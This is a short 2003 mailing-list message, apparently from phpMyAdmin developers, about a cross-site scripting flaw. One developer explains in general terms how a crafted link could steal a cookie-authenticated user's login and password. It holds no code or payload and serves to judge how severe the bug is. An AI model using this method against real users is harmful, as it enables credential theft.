On Wednesday 18 of June 2003 23:07, Garvin Hicking wrote:
Most actions need a valid 'session' to
execute cross-site scripting, which is not *that* serious.
Maybe even worse, you can include javascript that will read cookies with
login and password...
I don't know if I understand that correctly: You can only read your own
cookies with JavaScript, and you know that password already. Because when
others open a PMA page without a login, they only access their empty
cookie, right?
You know that somebody is using phpMyAdmin with cookie auth (maybe also http,
I'm not sure about JS possibilities in this way) on some url, you make him
somehow click on link you've created (it is not as hard as it seems for most
users) and you've got his login/password...
--
Regards
Michal Cihar
nijel at users dot sourceforge dot net
http://cihar.liten.cz